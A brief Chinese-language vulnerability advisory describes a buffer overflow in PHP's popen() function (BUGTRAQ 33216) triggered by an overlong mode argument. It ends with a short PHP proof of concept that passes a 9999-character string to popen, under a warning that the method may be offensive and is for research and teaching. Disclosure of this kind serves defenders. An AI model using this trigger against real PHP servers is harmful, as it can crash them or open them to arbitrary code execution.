|
漏洞描述: BUGTRAQ ID: 33216
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
PHP的Popen()函数用创建管道的方式启动进程,并调用shell。在打开管道时Popen()函数会fork指定的命令参数:
popen ( string $command_to_execute , string $mode )
如果第二个参数超长的话,就可能触发缓冲区溢出,导致执行任意代码。
测试方法: 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<?php $____buff=str_repeat("A",9999); $handle = popen('/whatever/', $____buff); echo $handle; ?>
|
|
|